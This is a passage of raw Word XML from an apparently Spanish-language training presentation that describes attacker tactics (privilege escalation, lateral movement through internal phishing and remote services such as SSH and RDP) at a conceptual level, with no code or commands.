          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
        <w:t>los</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="007A7B84">
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="007A7B84">
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
        <w:t>atacantes</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="007A7B84">
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C5ACC83" w14:textId="77777777" w:rsidR="001B199E" w:rsidRPr="007A7B84" w:rsidRDefault="001B199E">
      <w:pPr>
        <w:pStyle w:val="Textoindependiente"/>
        <w:spacing w:before="150"/>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="026496AF" w14:textId="77777777" w:rsidR="001B199E" w:rsidRPr="007A7B84" w:rsidRDefault="007F001E">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="34"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="1148"/>
        </w:tabs>
        <w:ind w:left="1148" w:hanging="359"/>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007A7B84">
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
        <w:t>Ejemplos: Restablecer la contraseña de un usuario de bajo perfil y usarla como puerta trasera a la red.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="67F569ED" w14:textId="77777777" w:rsidR="001B199E" w:rsidRPr="007A7B84" w:rsidRDefault="001B199E">
      <w:pPr>
        <w:pStyle w:val="Textoindependiente"/>
        <w:spacing w:before="245"/>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4CED8556" w14:textId="77777777" w:rsidR="001B199E" w:rsidRPr="007A7B84" w:rsidRDefault="007F001E">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="34"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="1149"/>
        </w:tabs>
        <w:spacing w:line="189" w:lineRule="auto"/>
        <w:ind w:left="1149" w:right="876" w:hanging="360"/>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007A7B84">
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
        <w:t>La escalada de privilegios consiste en obtener permisos de nivel superior en un sistema o red. Los enfoques comunes son aprovechar las debilidades del sistema, las configuraciones incorrectas y las vulnerabilidades</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F2115B9" w14:textId="77777777" w:rsidR="001B199E" w:rsidRPr="007A7B84" w:rsidRDefault="001B199E">
      <w:pPr>
        <w:pStyle w:val="Textoindependiente"/>
        <w:spacing w:before="174"/>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="434B401C" w14:textId="77777777" w:rsidR="001B199E" w:rsidRPr="007A7B84" w:rsidRDefault="007F001E">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="34"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="1148"/>
        </w:tabs>
        <w:spacing w:line="583" w:lineRule="exact"/>
        <w:ind w:left="1148" w:hanging="359"/>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007A7B84">
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
        <w:t>Cuentas de acceso elevado: -</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="38E74D36" w14:textId="77777777" w:rsidR="001B199E" w:rsidRPr="007A7B84" w:rsidRDefault="007F001E">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="34"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="1868"/>
        </w:tabs>
        <w:spacing w:line="482" w:lineRule="exact"/>
        <w:ind w:left="1868" w:hanging="359"/>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007A7B84">
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
        <w:t>SISTEMA/nivel raíz</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C89DEB2" w14:textId="77777777" w:rsidR="001B199E" w:rsidRPr="007A7B84" w:rsidRDefault="007F001E">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="34"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="1868"/>
        </w:tabs>
        <w:spacing w:line="484" w:lineRule="exact"/>
        <w:ind w:left="1868" w:hanging="359"/>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007A7B84">
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
        <w:t>Administrador local</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7031107A" w14:textId="77777777" w:rsidR="001B199E" w:rsidRPr="007A7B84" w:rsidRDefault="007F001E">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="34"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="1868"/>
        </w:tabs>
        <w:spacing w:line="485" w:lineRule="exact"/>
        <w:ind w:left="1868" w:hanging="359"/>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007A7B84">
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
        <w:t>Usuario con capacidades similares a las de un administrador</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="255212E8" w14:textId="77777777" w:rsidR="001B199E" w:rsidRPr="007A7B84" w:rsidRDefault="007F001E">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="34"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="1868"/>
        </w:tabs>
        <w:spacing w:line="487" w:lineRule="exact"/>
        <w:ind w:left="1868" w:hanging="359"/>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007A7B84">
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
        <w:t>Grupos privilegiados, etc.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="58AC080D" w14:textId="77777777" w:rsidR="001B199E" w:rsidRPr="007A7B84" w:rsidRDefault="001B199E">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
        <w:spacing w:line="487" w:lineRule="exact"/>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
        <w:sectPr w:rsidR="001B199E" w:rsidRPr="007A7B84">
          <w:pgSz w:w="19200" w:h="10800" w:orient="landscape"/>
          <w:pgMar w:top="0" w:right="0" w:bottom="580" w:left="0" w:header="0" w:footer="378" w:gutter="0"/>
          <w:cols w:space="720"/>
        </w:sectPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5ABDB649"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5808" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="6E21D0FA" wp14:editId="225AEA8D">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="page">
                  <wp:posOffset>0</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="page">
                  <wp:posOffset>0</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="12192000" cy="11938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44" name="Graphic 44"/>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45" name="Textbox 45"/>
                        <wps:cNvSpPr txBox="1"/>
                        <wps:spPr>
                          <a:xfrm>
                            <a:off x="0" y="0"/>
                            <a:ext cx="12192000" cy="1193800"/>
                          </a:xfrm>
                          <a:prstGeom prst="rect">
                            <a:avLst/>
                          </a:prstGeom>
                        </wps:spPr>
                        <wps:txbx>
                          <w:txbxContent>
                            <w:p w14:paraId="511E4D79" w14:textId="77777777" w:rsidR="001B199E" w:rsidRDefault="007F001E">
                              <w:pPr>
                                <w:spacing w:before="391"/>
                                <w:ind w:left="1"/>
                                <w:jc w:val="center"/>
                                <w:rPr>
                                  <w:b/>
                                  <w:sz w:val="88"/>
                                </w:rPr>
                              </w:pPr>
                              <w:r>
                                <w:rPr>
                                  <w:b/>
                                  <w:color w:val="FFFFFF"/>
                                  <w:sz w:val="88"/>
                                </w:rPr>
                                <w:t>Movimiento lateral</w:t>
                              </w:r>
                            </w:p>
                          </w:txbxContent>
                        </wps:txbx>
                        <wps:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0">
                          <a:noAutofit/>
                        </wps:bodyPr>
                      </wps:wsp>
                    </wpg:wgp>
                  </a:graphicData>
                </a:graphic>
              </wp:anchor>
            </w:drawing>
          </mc:Choice>
          <mc:Fallback>
            <w:pict>
              <v:group w14:anchorId="6E21D0FA" id="Group 43" o:spid="_x0000_s1055" style="position:absolute;margin-left:0;margin-top:0;width:960pt;height:94pt;z-index:15735808;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">
                <v:shape id="Graphic 44" o:spid="_x0000_s1056"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" path="m12192000,l,,,1193291r12192000,l12192000,xe" fillcolor="#b34512" stroked="f">
                  <v:path arrowok="t"/>
                </v:shape>
                <v:shape id="Textbox 45" o:spid="_x0000_s1057"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11E4D79" w14:textId="77777777" w:rsidR="001B199E" w:rsidRDefault="007F001E">
                        <w:pPr>
                          <w:spacing w:before="391"/>
                          <w:ind w:left="1"/>
                          <w:jc w:val="center"/>
                          <w:rPr>
                            <w:b/>
                            <w:sz w:val="88"/>
                          </w:rPr>
                        </w:pPr>
                        <w:r>
                          <w:rPr>
                            <w:b/>
                            <w:color w:val="FFFFFF"/>
                            <w:sz w:val="88"/>
                          </w:rPr>
                          <w:t>Movimiento lateral</w:t>
                        </w:r>
                      </w:p>
                    </w:txbxContent>
                  </v:textbox>
                </v:shape>
                <w10:wrap anchorx="page" anchory="page"/>
              </v:group>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B06E703" w14:textId="77777777" w:rsidR="001B199E" w:rsidRPr="007A7B84" w:rsidRDefault="001B199E">
      <w:pPr>
        <w:pStyle w:val="Textoindependiente"/>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="12D9256D" w14:textId="77777777" w:rsidR="001B199E" w:rsidRPr="007A7B84" w:rsidRDefault="001B199E">
      <w:pPr>
        <w:pStyle w:val="Textoindependiente"/>
        <w:spacing w:before="483"/>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2F7D7714" w14:textId="77777777" w:rsidR="001B199E" w:rsidRPr="007A7B84" w:rsidRDefault="007F001E">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="34"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="1148"/>
        </w:tabs>
        <w:spacing w:line="552" w:lineRule="exact"/>
        <w:ind w:left="1148" w:hanging="359"/>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007A7B84">
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
        <w:t>El movimiento lateral es cuando un atacante compromete u obtiene el control de un activo dentro de</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B4E01BE" w14:textId="77777777" w:rsidR="001B199E" w:rsidRPr="007A7B84" w:rsidRDefault="007F001E">
      <w:pPr>
        <w:pStyle w:val="Textoindependiente"/>
        <w:spacing w:line="552" w:lineRule="exact"/>
        <w:ind w:left="1149"/>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007A7B84">
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
        <w:t>una red y luego pasa de ese dispositivo a otros dentro de la misma red.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7AA5E129" w14:textId="77777777" w:rsidR="001B199E" w:rsidRPr="007A7B84" w:rsidRDefault="001B199E">
      <w:pPr>
        <w:pStyle w:val="Textoindependiente"/>
        <w:spacing w:before="316"/>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="48BBEDEF" w14:textId="77777777" w:rsidR="001B199E" w:rsidRPr="007A7B84" w:rsidRDefault="007F001E">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="34"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="1149"/>
        </w:tabs>
        <w:spacing w:line="213" w:lineRule="auto"/>
        <w:ind w:left="1149" w:right="777" w:hanging="360"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007A7B84">
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
        <w:t>Los atacantes pueden instalar sus propias herramientas de acceso remoto para llevar a cabo el movimiento lateral o usar credenciales legítimas con herramientas nativas de red y sistema operativo, que pueden ser más sigilosas.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6CA3D665" w14:textId="77777777" w:rsidR="001B199E" w:rsidRPr="007A7B84" w:rsidRDefault="001B199E">
      <w:pPr>
        <w:pStyle w:val="Textoindependiente"/>
        <w:spacing w:before="275"/>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6464C219" w14:textId="77777777" w:rsidR="001B199E" w:rsidRPr="007A7B84" w:rsidRDefault="007F001E">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="34"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="1148"/>
        </w:tabs>
        <w:ind w:left="1148" w:hanging="359"/>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007A7B84">
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
        <w:t>Ejemplo:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="08771805" w14:textId="77777777" w:rsidR="001B199E" w:rsidRPr="007A7B84" w:rsidRDefault="007F001E">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="34"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="1869"/>
        </w:tabs>
        <w:spacing w:before="84" w:line="213" w:lineRule="auto"/>
        <w:ind w:left="1869" w:right="725" w:hanging="360"/>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007A7B84">
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:b/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
        <w:t xml:space="preserve">Phishing interno: </w:t>
      </w:r>
      <w:r w:rsidRPr="007A7B84">
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
        <w:t>los atacantes pueden utilizar el phishing interno para obtener acceso a información adicional o explotar a otros usuarios dentro de la misma organización después de que ya tengan acceso a cuentas o sistemas dentro del entorno.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5BE1309C" w14:textId="77777777" w:rsidR="001B199E" w:rsidRPr="007A7B84" w:rsidRDefault="001B199E">
      <w:pPr>
        <w:pStyle w:val="Textoindependiente"/>
        <w:spacing w:before="93"/>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6912C4BC" w14:textId="77777777" w:rsidR="001B199E" w:rsidRPr="007A7B84" w:rsidRDefault="007F001E">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="34"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="1868"/>
        </w:tabs>
        <w:spacing w:before="1" w:line="460" w:lineRule="exact"/>
        <w:ind w:left="1868" w:hanging="359"/>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007A7B84">
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:b/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
        <w:t>Servicios remotos</w:t>
      </w:r>
      <w:r w:rsidRPr="007A7B84">
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
        <w:t xml:space="preserve">: Los atacantes de amenazas pueden usar credenciales válidas para iniciar sesión en servicios </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="007A7B84">
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
        <w:t>como</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="007A7B84">
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
        <w:t xml:space="preserve"> SSH, VNC, RDP</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="10124800" w14:textId="77777777" w:rsidR="001B199E" w:rsidRPr="007A7B84" w:rsidRDefault="007F001E">
      <w:pPr>
        <w:spacing w:line="460" w:lineRule="exact"/>
        <w:ind w:left="1869"/>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007A7B84">
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
        <w:t>y luego realizar operaciones, etc.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2860EA77" w14:textId="77777777" w:rsidR="001B199E" w:rsidRPr="007A7B84" w:rsidRDefault="001B199E">
      <w:pPr>
        <w:spacing w:line="460" w:lineRule="exact"/>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
        <w:sectPr w:rsidR="001B199E" w:rsidRPr="007A7B84">
          <w:pgSz w:w="19200" w:h="10800" w:orient="landscape"/>
          <w:pgMar w:top="0" w:right="0" w:bottom="560" w:left="0" w:header="0" w:footer="378" w:gutter="0"/>
          <w:cols w:space="720"/>
        </w:sectPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="290F8F21" w14:textId="77777777" w:rsidR="001B199E" w:rsidRPr="007A7B84" w:rsidRDefault="007F001E">
      <w:pPr>
        <w:pStyle w:val="Textoindependiente"/>
        <w:ind w:left="1415"/>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007A7B84">
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:noProof/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <mc:AlternateContent>
          <mc:Choice Requires="wpg">
            <w:drawing>
              <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="14E4F413" wp14:editId="30BE16E5">
                <wp:extent cx="10380345" cy="5659820"/>
                <wp:effectExtent l="0" t="0" r="1905"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0345" cy="5659820"/>
                          <a:chOff x="0" y="0"/>
                          <a:chExt cx="10380345" cy="6000115"/>
                        </a:xfrm>
                      </wpg:grpSpPr>
                      <pic:pic xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
                        <pic:nvPicPr>
                          <pic:cNvPr id="47" name="Image 47"/>
                          <pic:cNvPicPr/>
                        </pic:nvPicPr>
                        <pic:blipFill>
                          <a:blip r:embed="rId19" cstate="print"/>
                          <a:stretch>
                            <a:fillRect/>
                          </a:stretch>
                        </pic:blipFill>
                        <pic:spPr>
                          <a:xfrm>
                            <a:off x="0" y="0"/>
                            <a:ext cx="10380052" cy="6000056"/>
                          </a:xfrm>
                          <a:prstGeom prst="rect">
                            <a:avLst/>
                          </a:prstGeom>
                        </pic:spPr>
                      </pic:pic>
                      <pic:pic xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
                        <pic:nvPicPr>
                          <pic:cNvPr id="48" name="Image 48"/>
                          <pic:cNvPicPr/>
                        </pic:nvPicPr>
                        <pic:blipFill>
                          <a:blip r:embed="rId20" cstate="print"/>
                          <a:stretch>
                            <a:fillRect/>
                          </a:stretch>
                        </pic:blipFill>
                        <pic:spPr>
                          <a:xfrm>
                            <a:off x="164636" y="164639"/>
                            <a:ext cx="10064496" cy="5684520"/>
                          </a:xfrm>
                          <a:prstGeom prst="rect">
                            <a:avLst/>
                          </a:prstGeom>
                        </pic:spPr>
                      </pic:pic>
                    </wpg:wgp>
                  </a:graphicData>
                </a:graphic>
              </wp:inline>
            </w:drawing>
          </mc:Choice>
          <mc:Fallback>
            <w:pict>
              <v:group w14:anchorId="7055F8F2" id="Group 46" o:spid="_x0000_s1026" style="width:817.35pt;height:445.65pt;mso-position-horizontal-relative:char;mso-position-vertical-relative:line" coordsize="103803,60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">
                <v:shape id="Image 47" o:spid="_x0000_s1027" type="#_x0000_t75" style="position:absolute;width:103800;height:6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">
                  <v:imagedata r:id="rId21" o:title=""/>
                </v:shape>
                <v:shape id="Image 48" o:spid="_x0000_s1028" type="#_x0000_t75" style="position:absolute;left:1646;top:1646;width:100645;height:5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">
                  <v:imagedata r:id="rId22" o:title=""/>
                </v:shape>
                <w10:anchorlock/>
              </v:group>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
    </w:p>
    <w:p w14:paraId="54F2ABCB" w14:textId="77777777" w:rsidR="001B199E" w:rsidRPr="007A7B84" w:rsidRDefault="007F001E">
      <w:pPr>
        <w:spacing w:before="26"/>
        <w:ind w:left="1820"/>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007A7B84">
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
        <w:t>Referencia : blog.vmare.com</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7CB57D88" w14:textId="77777777" w:rsidR="001B199E" w:rsidRPr="007A7B84" w:rsidRDefault="001B199E">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
        <w:sectPr w:rsidR="001B199E" w:rsidRPr="007A7B84">
          <w:pgSz w:w="19200" w:h="10800" w:orient="landscape"/>
          <w:pgMar w:top="360" w:right="0" w:bottom="580" w:left="0" w:header="0" w:footer="378" w:gutter="0"/>
          <w:cols w:space="720"/>
        </w:sectPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="599DD519"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6832" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="3A626B8F" wp14:editId="6CC51494">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="page">
                  <wp:posOffset>0</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="page">
                  <wp:posOffset>0</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="12192000" cy="11938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50" name="Graphic 50"/>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51" name="Textbox 51"/>
                        <wps:cNvSpPr txBox="1"/>
                        <wps:spPr>
                          <a:xfrm>
                            <a:off x="0" y="0"/>
                            <a:ext cx="12192000" cy="1193800"/>
                          </a:xfrm>
                          <a:prstGeom prst="rect">
                            <a:avLst/>
                          </a:prstGeom>
                        </wps:spPr>
                        <wps:txbx>
                          <w:txbxContent>
                            <w:p w14:paraId="123ADD4F" w14:textId="77777777" w:rsidR="001B199E" w:rsidRDefault="007F001E">
                              <w:pPr>
                                <w:spacing w:before="391"/>
                                <w:ind w:left="1"/>
                                <w:jc w:val="center"/>
                                <w:rPr>
                                  <w:b/>
                                  <w:sz w:val="88"/>
                                </w:rPr>
                              </w:pPr>
                              <w:r>
                                <w:rPr>
                                  <w:b/>
                                  <w:color w:val="FFFFFF"/>
                                  <w:sz w:val="88"/>
                                </w:rPr>
                                <w:t>Evasión defensiva</w:t>
